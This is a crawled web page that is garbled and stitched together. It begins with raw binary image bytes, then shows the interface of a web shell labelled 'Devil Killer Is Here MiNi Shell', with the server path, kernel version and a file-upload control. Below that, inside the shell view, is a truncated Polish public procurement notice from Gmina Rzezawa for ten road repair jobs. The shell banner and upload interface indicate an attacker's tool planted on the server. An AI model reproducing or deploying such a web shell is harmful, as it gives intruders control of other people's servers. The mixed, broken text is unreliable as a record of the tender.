JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230417/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230417/0017990101-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przedmiotem zamówienia jest wykonanie zadań: 1.„Remont drogi gminnej nr 1664” w m. Borek, 2.„Remont drogi nr 492/16” w m. Buczków, 3.„Remont drogi nr 325/1” w m. Buczków, 4.„Nakł, 5,6,7,8,9,10 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Rzezawa</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 851660660</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Długa 21</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Rzezawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">32-765</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL214 - Krakowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 146484800</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">+48 146488550</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gmina@rzezawa.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.rzezawa.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonanie zadań: 1.„Remont drogi gminnej nr 1664” w m. Borek, 2.„Remont drogi nr 492/16” w m. Buczków, 3.„Remont drogi nr 325/1” w m. Buczków, 4.„Nakł, 5,6,7,8,9,10 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-3d379f12-dabe-11ed-9355-06954b8c6cb9</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00179901</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-04-17</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00046905/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.7 Remont dróg gminnych</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-3d379f12-dabe-11ed-9355-06954b8c6cb9 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu<br/>następujących środków komunikacji elektronicznej:<br/>a) platformy do obsługi postępowań przetargowych, dostępnej pod adresem: https://ezamowienia.gov.pl,<br/>b) poczty elektronicznej: gmina@rzezawa.pl<br/>Uwaga !: ofertę w postepowaniu można złożyć tylko za pośrednictwem platformy do obsługi postępowań dostępnej na stronie<br/>internetowej: https://ezamowienia.gov.pl. Korzystanie z platformy e-zamówienia jest bezpłatne</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja w postepowaniu z<br/>wyłączeniem składania ofert/wniosków o dopuszczenie do udziału w postepowaniu, odbywa się drogą elektroniczną za<br/>pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze” ( „Formularze do komunikacji”). Za pośrednictwem<br/>„Formularzy do komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielenie<br/>odpowiedzi. Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej wiadomości ( przycisk „dodaj<br/>załącznik”).<br/>Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy”<br/>na Platformie e-Zamówienia oraz zalogowania się na Platformie e-Zamówienia. Do korzystania z ‘Formularzy do komunikacji”<br/>służących do zadawania pytań dotyczących treści dokumentów zamówienia wystarczające jest posiadanie tzw. konta<br/>uproszczonego na Platformie e-Zamówienia.<br/>Wszystkie wysłane i odebrane w postępowaniu przez Wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie<br/>postępowania w zakładce „Komunikacja”.<br/>12.14. Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB ( wielkość ta<br/>dotyczy plików przesyłanych jako załączniki do jednego formularza).<br/>12.15. Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz<br/>informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia.<br/>12.16. W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy e-Zamówienia użytkownicy mogą<br/>skorzystać ze wsparcia technicznego dostępnego pod numerem telefonu (32) 77 88 999 lub drogą elektroniczną poprzez formularz<br/>udostępniony na stronie internetowej https:// ezamowienia.gov.pl w zakładce „Zgłoś problem”.<br/>Dodatkowo informujemy, że zgodnie z zapisami SWZ postępowanie o udzielenie zamówienia prowadzi się w języku polskim. W<br/>związku z powyższym wszelkie dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski. Więcej<br/>informacji dot. kwestii komunikacji w postępowaniu przedstawia SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 <br/>z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fiz. w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz.U.UE.L.119.1), zwanego dalej „RODO” informuje się, że:<br/><br/>1.	Administratorem Pani/Pana danych osobowych jest Wójt Gminy Rzezawa z siedzibą: <br/>32-765 Rzezawa, ul. Długa 21, tel. 14 648 48 00, e-mail: gmina@rzezawa.pl.<br/>2.	W sprawach dotyczących ochrony danych osobowych Wójt Gminy Rzezawa wyznaczył Ins. ochrony danych, z którym może się Pani/Pan kontaktować telefonicznie: <br/>nr tel.:14 6484818, elektronicznie: iod@rzezawa.pl.<br/>3.	Celem przetwarzania Pani/Pana danych osobowych jest – udział w postępowaniu <br/>o udzielenie zamówienia publicznego pn: Przedmiotem zamówienia jest wykonanie zadań: 1.„Remont drogi gminnej nr 1664” w m. Borek, 2.„Remont drogi nr 492/16” w m. Buczków, 3.„Remont drogi nr 325/1” w m. Buczków, 4.„Nakładka asfaltowa na drodze gminnej stanowiącej działkę nr 425 o szerokości 4 mb wraz z utwardzeniem pobocza od istniejącej nakładki na skrzyżowaniu na działce 352/2 w stronę krzyża” w m. Dąbrówka, 5.„Nakładka asfaltowa na drodze od sklepu gospodarczego c.d. do P. Padowskich” w m. Dębina, 6.„Dokończenie nawierzchni na ul. Spokojnej” w m. Krzeczów, 7.„ Modernizacja parkingu za budynkiem OSP Rzezawa”, 8.„Likwidacja przełomu ul. Akacjowa w m. Rzezawa”, 9.Likwidacja przełomu dz. nr ewid. 520 w m. Łazy, 10.Remont drogi nr ewid. dz 680/1 w m. Łazy o numerze RID.ZP.271.1.5.2023 z dnia 17.04.2023 r. prowadzonym w trybie podstawowym bez negocjacji.<br/>4.	Podstawa prawna przetwarzania:<br/>•	art. 6 ust. 1 lit. c – RODO;<br/>•	Ustawa z dnia 11 września 2019 r.- Pzp (t.j.Dz.U.2022.1710) zwana dalej ustawą Pzp.,<br/>5.	Pani/Pana dane osobowe będą udostępniane odbiorcom tj. osobom i podmiotom zgodnie <br/>z art. 74 ustawy Pzp.,<br/>6.	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy.<br/>7.	Obowiązek podania przez Panią/Pana danych osobowych jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zam. pub. Konsekwencje niepodania określonych danych wynikają z ustawy Pzp.<br/>8.	Posiada Pani/Pan prawo dostępu do swoich danych osobowych, prawo do sprostowania swoich danych osobowych, prawo żądania od administratora ograniczenia <br/>ich przetwarzania z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO.<br/>9.	Nie przysługuje Pani/Panu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO,<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>10.	Pani/Pana dane osobowe nie będą przekazywane do państw trzecich.<br/>11.	W odniesieniu do Pani/Pana danych osob. decyzje nie będą podejmowane w sposób zautomatyzowany i nie podlegają profilowaniu.<br/>12.	Przysługuje Pani/Panu prawo do złożenia skargi do organu nadzorczego, którym jest Prezes Urzędu Ochrony Danych Osob., ul. Stawki 2, 00-193 Warszawa, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO.<br/><br/><br/>Informujemy, że w zam. pub. administratorem danych osobowych obowiązanym do spełnienia obowiązku informacyjnego z art. 13 RODO będzie również:<br/><br/>Zamawiający – względem osób fizycznych, od których dane osobowe bezpośrednio pozyskał. Dotyczy to w szczególności: <br/>•	Wyk. będącego osobą fiz., <br/>•	Wyk. będącego osobą fiz. prowadzącą jednoosobową działalność gospodarczą<br/>• pełnomocnika Wyk. będącego osobą fiz. (np. dane osobowe zam. <br/>w peł.),</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RID.ZP.271.1.5.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	„Remont drogi gminnej nr 1664” w m. Borek. <br/>Zamówienie obejmuje mechaniczne wyrównanie istniejącej nawierzchni drogi masą mineralno–bitumiczną – warstwa wiążąca o grubości 2 cm po zawałowaniu, mechaniczne wykonanie warstwy ścieralnej z masy mineralno-bitumicznej o grubości 3 cm po zawałowaniu oraz dwustronne wyrównanie poboczy szerokości 0,4 m kruszywem drogowym frakcji 0/31,5 mm, z zagęszczeniem mechanicznym o śr. grubość 6 cm. Roboty obejmować będą odcinek drogi o długości ok. 80 m i szerokości ok. 3,5 m. <br/>2.	„Remont drogi nr 492/16” w m. Buczków<br/>Zamówienie obejmuje mechaniczne wykonanie koryta na całej szerokości jezdni głębokości 10 cm, wykonanie warstwy górnej podbudowy z kruszyw łamanych o grubości po zagęszczeniu 15 cm, mechaniczne profilowanie i zagęszczenie podłoża. Roboty obejmować będą odcinek drogi o długości ok. 60 m i szerokości ok. 3,8 m. <br/>3.	„Remont drogi nr 325/1” w m. Buczków<br/>Zamówienie obejmuje mechaniczne wyrównanie istniejącej nawierzchni drogi masą mineralno–bitumiczną – warstwa wiążąca o grubości 2 cm po zawałowaniu, mechaniczne wykonanie warstwy ścieralnej z masy mineralno-bitumicznej o grubości 3 cm po zawałowaniu oraz dwustronne wyrównanie poboczy szerokości 0,2 m kruszywem drogowym frakcji 0/31,5 mm, z zagęszczeniem mechanicznym o śr. grubość 6 cm. Roboty obejmować będą odcinek drogi o długości ok. 70 m i szerokości ok. 2,6 m. <br/>4.	„Nakładka asfaltowa na drodze gminnej stanowiącej działkę nr 425 o szerokości 4 mb wraz z utwardzeniem pobocza od istniejącej nakładki na skrzyżowaniu na działce 352/2 w stronę krzyża” w m. Dąbrówka<br/>Zamówienie obejmuje mechaniczne wyrównanie istniejącej nawierzchni drogi masą mineralno–bitumiczną – warstwa wiążąca o grubości 2 cm po zawałowaniu, mechaniczne wykonanie warstwy ścieralnej z masy mineralno-bitumicznej o grubości 3 cm po zawałowaniu oraz dwustronne wyrównanie poboczy szerokości 0,4 m kruszywem drogowym frakcji 0/31,5 mm, z zagęszczeniem mechanicznym o śr. grubość 6 cm. Roboty obejmować będą odcinek drogi o długości ok. 135 m i szerokości ok.3,5 m. <br/>5.	„Nakładka asfaltowa na drodze od sklepu gospodarczego c.d. do P. Padowskich” w m. Dębina<br/>Zamówienie obejmuje wykonanie warstwy górnej podbudowy z kruszyw łamanych o grubości po zagęszczeniu 10 cm, mechaniczne wyrównanie istniejącej nawierzchni masą mineralno–bitumiczną – warstwa wiążąca grubości 2 cm po zawałowaniu, mechaniczne wykonanie warstwy ścieralnej z masy mineralno-bitumicznej o grubości 3 cm po zawałowaniu oraz dwustronne wyrównanie poboczy szerokości 0,4 m kruszywem drogowym frakcji 0/31,5 mm. z zagęszczeniem mechanicznym o śr. grubość 6 cm. Roboty obejmować będą odcinek drogi o długości ok. 110 m i szerokości ok. 3,0 m. <br/>6.	„Dokończenie nawierzchni na ul. Spokojnej” w m. Krzeczów <br/>Zamówienie obejmuje wykonanie warstwy górnej podbudowy z kruszyw drogowych o grubości po zagęszczeniu 10 cm, profilowanie i zagęszczanie podłoża - wykonanie mechaniczne pod warstwy konstrukcyjne nawierzchni , mechaniczne oczyszczanie i skropienie międzywarstwowe emulsją asfaltową na zimno, wykonanie nawierzchni z mieszanek mineralno-bitumicznych - warstwa ścieralna asfaltowa o grubości po zagęszczeniu 5cm oraz dwustronne wyrównanie poboczy o szerokości 0,4 m kruszywem drogowym łamanym frakcji 0-31,5 mm z zagęszczeniem mechanicznym o śr. grubości 6cm. Roboty obejmować będą odcinek drogi o długości ok. 90 m i szerokości ok 3,5 m. <br/>7.	„ Modernizacja parkingu za budynkiem OSP Rzezawa”<br/>Zamówienie obejmuje wykonanie nawierzchni z mieszanek mineralno-bitumicznych - warstwa wiążąca asfaltowa o grubości po zagęszczeniu 2 cm oraz nawierzchni z mieszanek mineralno - bitumicznych - warstwa ścieralna asfaltowa o grubości po zagęszczeniu 3 cm na powierzchni ok. 400m2<br/>8.	„Likwidacja przełomu ul. Akacjowa w m. Rzezawa”<br/>Zamówienie obejmuje cięcie mechaniczne nawierzchni z mas mineralno - asfaltowych o głębokości cięcia 5 cmi długości ok. 14 m, rozebranie mechaniczne nawierzchni bitumicznej z wywozem grubości 5 cm, rozebranie podbudowy z kruszywa kamiennego z wywozem grubości 30 cm, wykonanie nawierzchni z tłucznia kamiennego (warstwa dolna ) o powierzchni ok. 20 m² , wykonanie nawierzchni z tłucznia kamiennego warstwa górna 10 cm po uwałowaniu na powierzchni 20 m² oraz wykonanie nawierzchni z masy mineralno-bitumicznej ścieralnej 5cm po zawałowaniu na powierzchni 20 m². <br/><br/>9.	Likwidacja przełomu dz. nr ewid. 520 w m. Łazy<br/>Zamówienie obejmuje cięcie mechaniczne nawierzchni z mas mineralno - asfaltowych o głębokości cięcia 5 cmi długości ok. 14 m, rozebranie mechaniczne nawierzchni bitumicznej z wywozem grubości 5 cm, rozebranie podbudowy z kruszywa kamiennego z wywozem grubości 30 cm, wykonanie nawierzchni z tłucznia kamiennego (warstwa dolna ) o powierzchni ok. 20 m² , wykonanie nawierzchni z tłucznia kamiennego warstwa górna 10 cm po uwałowaniu na powierzchni 20 m² oraz wykonanie nawierzchni z masy mineralno-bitumicznej ścieralnej 5cm po zawałowaniu na powierzchni 20 m². <br/><br/>10.	Remont drogi nr ewid. dz 680/1 w m. Łazy<br/>Zamówienie obejmuje wykonanie nawierzchni na części działki nr ewid. 680/1 z masy mineralno-bitumicznej ścieralnej grubości 5cm po zawałowaniu, na długości ok. 146 m. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233140-2 - Roboty drogowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233100-0 - Roboty w zakresie budowy autostrad, dróg</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający przewiduje możliwość udzielenia zamówień podobnych, na podstawie art. 214 ust. 1 pkt 7 ustawy PZP, polegającą na tym, że w okresie 3 lat od dnia udzielenia niniejszego zamówienia publicznego, udzieli ewentualnie wyłonionemu w tym postępowaniu Wykonawcy zamówienia polegającego na powtórzeniu podobnych robót budowlanych na terenie objętym przedmiotem zamówienia, do 50% wartości szacunkowej zamówienia podstawowego, co zostało skalkulowane przy szacowaniu wartości zamówienia podstawowego, a może być udzielone na warunkach przewidzianych w umowie dla postępowania i zamówienia podstawowego. Podstawowym warunkiem ewentualnego udzielenia zamówienia podobnego będzie fakt, że<br/>w ramach niniejszego zamówienia publicznego Wykonawca realizował roboty budowlane <br/>w terminie i z najwyższą starannością. Ponadto ewentualne udzielenie Wykonawcy zamówienia podstawowego zamówienia podobnego warunkowane jest też tym, że zapewni on nie gorszy standard i jakość oraz warunki gwarancyjne wykonywania nowego zamówienia niż dotyczące zamówienia podstawowego, a także że Wykonawca zaakceptuje istotne warunki dotychczasowej umowy, jak również strony w wyniku negocjacji uzgodnią wynagrodzenie oraz termin wykonania takiego zamówienia. Zamówienia podobne mogą dotyczyć wykonania robót budowlanych <br/>w zakresie powtórzenia realizacji podobnych robót budowlanych, w szczególności robót ziemnych, remontu dróg o naw. bitumicznej oraz wykonania naw. bitumicznych na drogach z kruszyw drogowych, oraz robót towarzyszących, funkcjonalnie powiązanych z przedmiotem zamówienia podstawowego.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Sposób oceny ofert został szczegółowo opisany w SWZ. Ocenie ofert<br/>podlegają tylko oferty nie podlegające odrzuceniu. Oferta oceniana jest wg. przyjętych w postępowaniu<br/>kryteriów ceny: Cena - 60 %, wydłużenie okresu gwarancji ponad wymagany okres gwarancji<br/>wynoszący 3 lata - 40 %</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Wydłużenie okresu gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i 